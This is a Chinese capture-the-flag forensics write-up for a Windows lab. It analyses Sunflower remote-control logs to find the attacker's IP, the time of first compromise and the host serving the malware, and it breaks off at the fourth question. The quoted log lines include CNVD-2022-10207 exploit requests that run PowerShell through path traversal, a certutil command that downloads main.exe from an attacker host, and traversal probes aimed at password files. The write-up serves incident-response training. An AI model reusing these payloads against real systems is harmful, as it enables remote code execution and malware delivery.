玄机——第四章 windows实战-向日葵 wp.md

First Post:

2025-01-09

Last Update:

2025-01-13

玄机——第四章 windows实战-向日葵 wp

一、前言

二、概览简介

三、参考文章

四、步骤（解析）

一、前言

题目链接：第四章 windows实战-向日葵

简单介绍一下向日葵；

向日葵远程连接软件是一款专为远程控制、远程管理和远程协助而设计的工具，适用于个人用户和企业用户。

功能特点

远程桌面控制：

允许用户通过网络远程控制另一台计算机的桌面，就像操作本地计算机一样。支持多屏显示、屏幕录像、键盘鼠标控制等功能。

远程文件管理：

用户可以在远程计算机之间传输文件，进行文件的上传、下载、删除、重命名等操作。

提供文件夹同步功能，实现两台设备之间的文件自动同步。

远程摄像头监控：

可以通过远程查看连接到远程计算机的摄像头，实现远程监控功能。支持实时视频传输，查看监控画面。

远程开关机：

支持通过网络远程启动或关闭计算机，方便进行远程管理。可以设定定时开关机任务，实现自动化管理。

远程协助：

用户可以通过向日葵软件向他人提供远程技术支持和帮助。支持多人协作，共享屏幕，进行在线会议和培训。

跨平台支持：

向日葵支持多种操作系统，包括Windows、macOS、Linux、Android和iOS。

用户可以通过不同设备进行远程连接和管理。

二、概览

简介

第四章 windows实战 Administrator xj@123456

题目；

1、通过本地 PC RDP到服务器并且找到黑客首次攻击成功的时间为为多少,将黑客首次攻击成功的时间为作为 FLAG 提交(2028-03-26 08:11:25.123);

2、通过本地 PC RDP到服务器并且找到黑客攻击的 IP 为多少,将黑客攻击 IP 作为 FLAG 提交;

3、通过本地 PC RDP到服务器并且找到黑客托管恶意程序 IP 为,将黑客托管恶意程序 IP 作为

FLAG 提交;

4、找到黑客解密 DEC 文件,将黑客DEC 文件的 md5 作为 FLAG 提交;

5、通过本地 PC RDP到服务器并且解密黑客勒索软件,将桌面加密文件中关键信息作为 FLAG

提交;

三、参考文章

玄机——第四章 windows实战-向日葵

四、步骤（解析）

准备步骤#1.0

这里的靶机环境是windows，所以正常的我们使用远程桌面连接即可；

这里推荐大家使用“Microsoft“自带的远程桌面连接即可即可；（有一些笔记本/电脑是不自带的，不过已为大家准备好安装包）

123网盘下载；

ht t ps://www.123pan.com/s/q2J1jv-r8avd.html

提取码:0905

安装完成，进入主页，点击右上角“添加”–>”电脑”，接着启动靶机，输入靶机IP，点击“保存”，返回主页，点击连接，最后输入账号密码即可；

输入靶机IP，点击保存，返回主页；

输入账号密码，点击连接即可；

Administrator xj@123456

最后连接成功；

步骤#1.1

通过本地 PC RDP到服务器并且找到黑客首次攻击成功的时间为为多少,将黑客首次攻击成功的时间为作为 FLAG 提交(2028-03-26 08:11:25.123);

解题思路

题目让我们提交黑客首次攻击成功的时间，那这题既然主要的是“向日葵”，而且桌面也有个

“向日葵”，那肯定就是查日志分析了，那这里我们直接右键“向日葵”，接着打开文件位置就可以发现“log”目录，最后继续分析即可；

右键“打开文件所在位置”；

发现“log”目录，跟进分析；

那题目既然说是首次成功攻击，那肯定就从日志最早的时间查看分析起，如果这个日志没有发现，那就以此类推继续往下分析；

那打开日志，我们就主要分析以下特征，从而缩小范围进行查找；

特征

异常登录记录：

登录记录从未知或可疑IP地址。

非常规时间段内的登录行为。

频繁连接请求：

短时间内的多次连接尝试，尤其是从相同IP地址。

失败登录尝试：

多次失败登录尝试，可能表示暴力破解尝试。

新设备注册：

是否有新设备绑定到你的向日葵账户。

高频操作记录：

短时间内的高频率操作记录。

那就主要根据这几个特征分析呗，日志往下翻一点就发现了关键点；

简单分析一下这里；

这里的日志记录，可以看出确实是黑客的在进行攻击尝试。这些日志显示了多个HTTP连接尝试，每个连接尝试都有不同的路径和参数，这些路径和参数是漏洞利用或恶意扫描。

多个新连接

日志显示在同一时间段内，多个新连接尝试从同一IP地址（192.168.31.45）到目标IP地址

（192.168.31.114），如下所示：

2024-03-21 19:54:56.229 - Info -

[service][TcpAcceptor] new acceptor

192.168.31.45:58540–>192.168.31.114:49724

2024-03-21 19:54:56.244 - Info - [service][TcpAcceptor] new acceptor

192.168.31.45:58542–>192.168.31.114:49724

2024-03-21 19:54:56.244 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:58543–>192.168.31.114:49724

2024-03-21 19:54:56.245 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:58544–>192.168.31.114:49724

可疑的HTTP路径和参数

每个连接尝试的路径和参数都显示了对特定资源的访问，这些资源路径和参数是已知漏洞利用的路径。

/pages/createpage-entervariables.action?SpaceKey=x:

描述：这个请求看起来像是针对某个网页应用框架的攻击尝试，可能是针对

Confluence 的命令注入。

参数：

SpaceKey=x ：攻击者尝试通过设置某个参数来利用该漏洞。

目标：通过设置不安全的参数值，可能会导致服务器执行恶意代码或命令。

/CFIDE/administrator/enter.cfm? locale=../../../../../../../lib/password.properties%00en:

描述：这是一个目录遍历攻击，它试图通过操纵路径来访问敏感文件。参数：

locale=../../../../../../../lib/password.properties%00en ：攻击者使用了目录遍历 ( ../../../../../../../ ) 和空字符 ( %00 ) 来访问本不应公开

的文件。

password.properties

目标：读取或修改配置文件，可能包含敏感信息如密码。

/mailsms/s?func=ADMIN

&dumpConfig=/:

描述：这个请求试图利用一个功能（可能是一个管理功能）来获取系统配置信息。参数：

func=ADMIN:appState&dumpConfig=/ ：这个参数组合看起来像是试图调用一个管理命令 ( ADMIN:appState ) 并将配置信息导出。

目标：获取系统配置和状态信息，可能包括敏感数据。

三个分析下来发现是——CNVD-2022-10207：向日葵远程控制软件 RCE 漏洞

**CNVD-2022-10207 **漏洞是一种远程命令执行漏洞，存在于向日葵远程控制软件中。攻击者可以通过特制的 HTTP 请求利用此漏洞，执行任意命令或代码。

攻击过程

发送特制请求：攻击者发送精心构造的 HTTP 请求，利用应用程序中存在的漏洞。
执行恶意命令：服务器在处理这些请求时，由于存在输入验证缺陷或路径处理不当，导致执行攻击者注入的恶意命令。
获取权限：成功利用漏洞后，攻击者可以获得服务器上的远程控制权限，执行任意代码、修改数据或进一步渗透网络。

总结；

从这些日志记录中可以发现黑客利用了许多漏洞，这是一次次攻击尝试；

同一IP地址的多个连接尝试：

同一时间段内从192.168.31.45发起了多个连接，显示了明显的扫描或攻击行为。

可疑的HTTP路径和参数：

路径和参数显示了对系统特定资源的访问尝试，并且这些资源通常涉及漏洞利用

（如路径遍历、配置文件读取等）。

所以开头这里的日志并没有发现黑客攻击成功，只是发现了黑客尝试利用各种漏洞进行攻击，那我们就继续往下分析，也是在日志的最底下发现了信息；

简单分析一下这里；日志主要记录；

2024-03-26 10:16:25.570 - Info -

[Acceptor][HTTP] new RC HTTP

connection 192.168.31.45:64246, path: /cgi-bin/rpc?action=verify-haras,

version: HTTP/1.1

2024-03-26 10:16:25.570 - Info - [Acceptor][HTTP] new RC HTTP

connection 192.168.31.45:64246,/cgi-bin/rpc?action=verify-haras, plugin:cgi- bin, session:

2024-03-26 10:16:25.585 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64247–>192.168.31.114:49724

2024-03-26 10:16:25.585 - Info - [Acceptor][HTTP] new RC HTTP

connection 192.168.31.45:64247, path: /check?

cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWi

ndowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami, version: HTTP/1.1 2024-03-26 10:16:25.585 - Info - [Acceptor][HTTP] new RC HTTP

connection 192.168.31.45:64247,/check? cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWi

ndowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami, plugin:check, session:dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3

2024-03-26 10:17:01.060 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64284–>192.168.31.114:49724

2024-03-26 10:17:01.060 - Info - [Acceptor][HTTP] new RC HTTP

connection 192.168.31.45:64284, path: /cgi-bin/rpc?action=verify-haras, version: HTTP/1.1

2024-03-26 10:17:01.060 - Info - [Acceptor][HTTP] new RC HTTP

connection 192.168.31.45:64284,/cgi-bin/rpc?action=verify-haras, plugin:cgi- bin, session:

2024-03-26 10:17:01.075 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64285–>192.168.31.114:49724

2024-03-26 10:17:01.075 - Info - [Acceptor][HTTP] new RC HTTP

connection 192.168.31.45:64285, path: /check? cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWi

ndowsPowerShell%2Fv1.0%2Fpowershell.exe+pwd, version: HTTP/1.1

2024-03-26 10:17:01.075 - Info - [Acceptor][HTTP] new RC HTTP

connection 192.168.31.45:64285,/check? cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWi

ndowsPowerShell%2Fv1.0%2Fpowershell.exe+pwd, plugin:check, session:DTOAQFngEPZBDNNp5QLOYftzErN7RBCA

2024-03-26 10:17:20.423 - Info - [localserver] Not use proxy

分析

请求路径和命令:

/check?

cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem3

2%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami

/check?

cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem3

2%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+pwd

这些路径和命令表明黑客正在尝试通过路径遍历攻击来访问并执行PowerShell命令，这些命令的目的是验证是否能够成功执行系统命令。 whoami 命令用于查看当前执行命令的用户， pwd 命令用于查看当前工作目录。

HTTP连接建立:

日志中多次记录了从攻击者IP（192.168.31.45）到目标IP（192.168.31.114）的

HTTP连接，表明攻击者正在反复尝试连接和执行命令。

攻击成功的迹象:

虽然日志中没有显示命令的具体返回结果，但多次的连接请求和特定路径命令的使用表明攻击者在测试和确认命令执行的有效性。尤其是执行whoami 和pwd 命令，这通常是攻击者在初步获取访问权限后进行的操作，以确认他们的权限级别和工作目录。

总结；

日志记录表明，攻击者在2024年3月26日10:16:25通过路径遍历和命令注入成功执行了

PowerShell命令。虽然没有具体的返回结果，但结合上下文，以下是关键点：

路径遍历攻击成功：攻击者通过路径遍历攻击成功访问并执行了系统命令。
权限确认：执行whoami 和pwd 命令表明攻击者正在确认其访问权限和工作目录，通常在获取成功的初步权限后进行。

题目让我们提交黑客首次攻击成功的具体时间，提交格式：flag{2028-03-26 08:11:25.123}；

至此；

flag{2024-03-26 10:16:25.585}

步骤#1.2

通过本地 PC RDP到服务器并且找到黑客攻击的 IP 为多少,将黑客攻击 IP 作为

**FLAG 提交;**

解题思路

题目让我们提交黑客攻击的IP，我觉得这题应该放第一小题，题一我们黑客首次成功时间都找到了，那就顺便看看日志记录的IP即可，这题没啥好说的；

得到；

清一色的IP，直接提交即可；

flag{192.168.31.45}

步骤#1.3

通过本地 PC RDP到服务器并且找到黑客托管恶意程序 IP 为,将黑客托管恶意程序 IP 作为 FLAG 提交;

解题思路

题目让我们提交黑客托管的恶意程序IP，那我们还是继续在日志里面寻找一下特定的特征；

特征；

异常的外部连接：

查找日志中所有与外部IP的连接记录，尤其是那些与已知可信IP不同的连接。

不常见的端口号：

检查使用不常见端口号的连接，因为黑客通常使用非标准端口来隐藏他们的活动。

频繁的重复连接：

关注短时间内频繁连接的IP地址，这可能表明尝试持续的攻击或数据传输。

可疑的请求路径：

检查请求路径中包含敏感操作或看起来不正常的路径。

分析日志格式：

确定日志中的外部连接记录格式，如连接源IP和目标IP的格式。

刚刚好，接着上题往下翻一点就发现了关键；

得到；

简单分析一下；

首先可以确认的是，这里的日志条目就显示了黑客从外部服务器下载并执行恶意程序的过程。逐步分析；

1、新连接建立：

2024-03-26 10:31:07.538 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:49328–>192.168.31.114:49724

说明：从IP 192.168.31.45 发起了到IP 192.168.31.114 的新连接。

端口号：源端口49328，目标端口49724。

2、HTTP连接建立：

2024-03-26 10:31:07.538 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49328, path: /cgi-bin/rpc?action=verify-haras, version: HTTP/1.1

说明：通过HTTP协议建立连接，访问路径为 /cgi-bin/rpc?action=verify-haras 。

插件：cgi-bin。会话：无。

3、新连接建立：

2024-03-26 10:31:07.576 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:49329–>192.168.31.114:49724

说明：从IP 192.168.31.45 发起了到IP 192.168.31.114 的另一新连接。

端口号：源端口49329，目标端口49724。

4、HTTP连接建立并执行命令：

说明：通过HTTP协议建立连接，并执行命令 /check?

cmd=ping….windows/system32/WindowsPowerShell/v1.0/powershell.exe certutil

-urlcache -split -f http ://192.168.31.249/main .exe 。

2024-03-26 10:31:07.576 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49329, path: /check? cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWi

ndowsPowerShell%2Fv1.0%2Fpowershell.exe+certutil+-urlcache+-split+- f+http%3A%2F%2F192.168.31.249%2Fmain.exe, version: HTTP/1.1

插件：check。

会话：sobGzXzWBfSlSbdqnmkUbJMLEjhssRx1。

主要关键点；

恶意活动指示：

路径遍历： /check?cmd=ping 是一种路径遍历尝试，试图访问系统中的

powershell.exe 。

命令执行：使用 外部IP：下载源外部服务器。

恶意程序下载：

工具下载文件 main.exe 。

指向一个可能托管恶意程序的

certutil

http ://192.168.31.249/main .exe

工具使用： certutil 是一个合法的Windows工具，但在这里被用于下载恶意文

件，这是一个常见的攻击模式。

下载目标：目标文件可能是恶意程序。

main.exe

总结；

这些日志条目显示了黑客尝试利用路径遍历和命令注入漏洞，通过

从外部服务

certutil

器（192.168.31.249）下载并执行恶意程序 main.exe 。这表明黑客的攻击成功了，且试图在目标系统上下载并运行恶意软件。

题目让我们提交黑客托管恶意程序 IP；

至此；

flag{192.168.31.249}

步骤#1.4

找到黑客解密 DEC 文件,将黑客DEC 文件的 md5 作为 FLAG 提交;

解题思路

题目让我们提交黑客解密的DEC文件的MD5，那我们先在日志里尝试搜索一下文件名 “DES”，看看有没有被定位到路径，但是发现没有这个文件，但是在差不多日志最底下发现了一个txt，那个txt里的内容是一个QQ号，抱着尝试的心情加了一下，最后在该群的“群文件”中发现了“DES”；（事后发现这是该平台的官方QQ群“玄机”）

未查到到文件“DEC”；